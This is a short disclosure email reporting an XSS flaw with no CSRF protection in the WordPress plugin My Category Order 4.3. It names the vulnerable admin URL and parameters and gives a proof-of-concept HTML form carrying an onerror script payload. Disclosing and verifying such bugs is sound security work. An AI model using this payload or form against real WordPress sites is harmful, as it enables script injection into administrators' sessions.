Subject: Cross-Site Scripting (XSS) in My Category Order 4.3
Date: Thu, 13 Aug 2015 17:06:10 +0200

Hello,

Plugin: My Category Order 4.3 https://wordpress.org/plugins/my-category-order/

1. Cross-Site Scripting (XSS) 

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/edit.php?page=mycategoryorder
Vulnerable parameters: cats, hdnParentID

Example PHP callstack:
mycategoryorder   [/my-category-order/mycategoryorder.php:121]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/edit.php?page=mycategoryorder">
<input type="text" name="btnSubCats" value="1" />
<input type="text" name="cats" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,